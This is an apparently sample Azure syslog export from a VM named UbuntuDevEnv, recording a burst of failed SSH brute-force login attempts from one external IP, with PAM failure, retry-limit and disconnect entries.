+2273,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:59,UbuntuDevEnv,2019-06-28 05:10:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92134,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2274,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:01,UbuntuDevEnv,2019-06-28 05:11:01,auth,UbuntuDevEnv,info,Failed password for invalid user  from 193.201.224.232 port 39624 ssh2,92134,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,39624,,
+2275,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:01,UbuntuDevEnv,2019-06-28 05:11:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92134,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2276,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:03,UbuntuDevEnv,2019-06-28 05:11:03,auth,UbuntuDevEnv,info,Failed password for invalid user  from 193.201.224.232 port 39624 ssh2,92134,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,39624,,
+2277,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:05,UbuntuDevEnv,2019-06-28 05:11:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92134,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2278,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:08,UbuntuDevEnv,2019-06-28 05:11:08,auth,UbuntuDevEnv,info,Failed password for invalid user  from 193.201.224.232 port 39624 ssh2,92134,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,39624,,
+2279,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:19,UbuntuDevEnv,2019-06-28 05:11:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92134,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2280,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:21,UbuntuDevEnv,2019-06-28 05:11:20,auth,UbuntuDevEnv,info,Failed password for invalid user  from 193.201.224.232 port 39624 ssh2,92134,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,39624,,
+2281,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:21,UbuntuDevEnv,2019-06-28 05:11:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92134,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2282,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:23,UbuntuDevEnv,2019-06-28 05:11:22,auth,UbuntuDevEnv,info,Failed password for invalid user  from 193.201.224.232 port 39624 ssh2,92134,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,39624,,
+2283,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:23,UbuntuDevEnv,2019-06-28 05:11:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92134,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2284,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:25,UbuntuDevEnv,2019-06-28 05:11:24,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,92134,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+2285,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:25,UbuntuDevEnv,2019-06-28 05:11:24,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user  from 193.201.224.232 port 39624 ssh2 [preauth],92134,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,39624,,
+2286,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:25,UbuntuDevEnv,2019-06-28 05:11:24,auth,UbuntuDevEnv,info,Failed password for invalid user  from 193.201.224.232 port 39624 ssh2,92134,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,39624,,
+2287,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:25,UbuntuDevEnv,2019-06-28 05:11:24,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92134,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2288,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:25,UbuntuDevEnv,2019-06-28 05:11:24,auth,UbuntuDevEnv,info,Disconnecting invalid user  193.201.224.232 port 39624: Too many authentication failures [preauth],92134,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,39624,,
+2289,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:33,UbuntuDevEnv,2019-06-28 05:11:32,auth,UbuntuDevEnv,info,Invalid user  from 193.201.224.232 port 57017,92257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,57017,,
+2290,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:33,UbuntuDevEnv,2019-06-28 05:11:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2291,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:33,UbuntuDevEnv,2019-06-28 05:11:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2292,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:35,UbuntuDevEnv,2019-06-28 05:11:35,auth,UbuntuDevEnv,info,Failed password for invalid user  from 193.201.224.232 port 57017 ssh2,92257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,57017,,
+2293,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:35,UbuntuDevEnv,2019-06-28 05:11:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2294,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:38,UbuntuDevEnv,2019-06-28 05:11:37,auth,UbuntuDevEnv,info,Failed password for invalid user  from 193.201.224.232 port 57017 ssh2,92257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,57017,,
+2295,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:38,UbuntuDevEnv,2019-06-28 05:11:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2296,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:39,UbuntuDevEnv,2019-06-28 05:11:39,auth,UbuntuDevEnv,info,Failed password for invalid user  from 193.201.224.232 port 57017 ssh2,92257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,57017,,
+2297,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:41,UbuntuDevEnv,2019-06-28 05:11:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2298,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:43,UbuntuDevEnv,2019-06-28 05:11:43,auth,UbuntuDevEnv,info,Failed password for invalid user  from 193.201.224.232 port 57017 ssh2,92257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,57017,,
+2299,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:43,UbuntuDevEnv,2019-06-28 05:11:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2300,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:45,UbuntuDevEnv,2019-06-28 05:11:45,auth,UbuntuDevEnv,info,Failed password for invalid user  from 193.201.224.232 port 57017 ssh2,92257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,57017,,
+2301,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:45,UbuntuDevEnv,2019-06-28 05:11:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2302,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:47,UbuntuDevEnv,2019-06-28 05:11:47,auth,UbuntuDevEnv,info,Failed password for invalid user  from 193.201.224.232 port 57017 ssh2,92257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,57017,,
+2303,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:47,UbuntuDevEnv,2019-06-28 05:11:47,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,92257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+2304,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:47,UbuntuDevEnv,2019-06-28 05:11:47,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2305,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:47,UbuntuDevEnv,2019-06-28 05:11:47,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user  from 193.201.224.232 port 57017 ssh2 [preauth],92257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,57017,,
+2306,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:47,UbuntuDevEnv,2019-06-28 05:11:47,auth,UbuntuDevEnv,info,Disconnecting invalid user  193.201.224.232 port 57017: Too many authentication failures [preauth],92257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,57017,,
+2307,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:49,UbuntuDevEnv,2019-06-28 05:11:49,auth,UbuntuDevEnv,info,Invalid user  from 193.201.224.232 port 39838,92316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,39838,,
+2308,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:49,UbuntuDevEnv,2019-06-28 05:11:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2309,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:49,UbuntuDevEnv,2019-06-28 05:11:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2310,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:51,UbuntuDevEnv,2019-06-28 05:11:50,auth,UbuntuDevEnv,info,Failed password for invalid user  from 193.201.224.232 port 39838 ssh2,92316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,39838,,
+2311,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:51,UbuntuDevEnv,2019-06-28 05:11:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2312,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:52,UbuntuDevEnv,2019-06-28 05:11:52,auth,UbuntuDevEnv,info,Failed password for invalid user  from 193.201.224.232 port 39838 ssh2,92316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,39838,,
+2313,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:52,UbuntuDevEnv,2019-06-28 05:11:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2314,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:55,UbuntuDevEnv,2019-06-28 05:11:54,auth,UbuntuDevEnv,info,Failed password for invalid user  from 193.201.224.232 port 39838 ssh2,92316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,39838,,
+2315,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:55,UbuntuDevEnv,2019-06-28 05:11:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2316,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:57,UbuntuDevEnv,2019-06-28 05:11:57,auth,UbuntuDevEnv,info,Failed password for invalid user  from 193.201.224.232 port 39838 ssh2,92316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,39838,,
+2317,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:11:58,UbuntuDevEnv,2019-06-28 05:11:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2318,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:00,UbuntuDevEnv,2019-06-28 05:12:00,auth,UbuntuDevEnv,info,Failed password for invalid user  from 193.201.224.232 port 39838 ssh2,92316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,39838,,
+2319,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:00,UbuntuDevEnv,2019-06-28 05:12:00,authpriv,UbuntuDevEnv,notice,PAM 4 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2320,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:00,UbuntuDevEnv,2019-06-28 05:12:00,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  5 > 3,92316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+2321,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:00,UbuntuDevEnv,2019-06-28 05:12:00,auth,UbuntuDevEnv,info,"Disconnecting invalid user  193.201.224.232 port 39838: Change of username or service not allowed: (,ssh-connection) -> ( ccrusr,ssh-connection) [preauth]",92316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,39838,,
+2322,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:02,UbuntuDevEnv,2019-06-28 05:12:01,auth,UbuntuDevEnv,info,Invalid user  ccrusr from 193.201.224.232 port 16467,92358,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,16467,,
+2323,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:02,UbuntuDevEnv,2019-06-28 05:12:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92358,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2324,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:02,UbuntuDevEnv,2019-06-28 05:12:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92358,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2325,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:03,UbuntuDevEnv,2019-06-28 05:12:03,auth,UbuntuDevEnv,info,Failed password for invalid user  ccrusr from 193.201.224.232 port 16467 ssh2,92358,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,16467,,
+2326,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:05,UbuntuDevEnv,2019-06-28 05:12:04,auth,UbuntuDevEnv,info,"Disconnecting invalid user  ccrusr 193.201.224.232 port 16467: Change of username or service not allowed: ( ccrusr,ssh-connection) -> (,ssh-connection) [preauth]",92358,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,16467,,
+2327,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:06,UbuntuDevEnv,2019-06-28 05:12:05,auth,UbuntuDevEnv,info,Invalid user  from 193.201.224.232 port 20374,92383,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,20374,,
+2328,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:06,UbuntuDevEnv,2019-06-28 05:12:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92383,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2329,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:06,UbuntuDevEnv,2019-06-28 05:12:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92383,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2330,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:08,UbuntuDevEnv,2019-06-28 05:12:08,auth,UbuntuDevEnv,info,Failed password for invalid user  from 193.201.224.232 port 20374 ssh2,92383,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,20374,,
+2331,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:08,UbuntuDevEnv,2019-06-28 05:12:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92383,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2332,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:10,UbuntuDevEnv,2019-06-28 05:12:10,auth,UbuntuDevEnv,info,Failed password for invalid user  from 193.201.224.232 port 20374 ssh2,92383,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,20374,,
+2333,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:12:11,UbuntuDevEnv,2019-06-28 05:12:10,auth,UbuntuDevEnv,info,"Disconnecting invalid user  193.201.224.232 port 20374: Change of username or service not allowed: (,ssh-connection) -> (0,ssh-connection) [preauth]",92383,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,20374,,
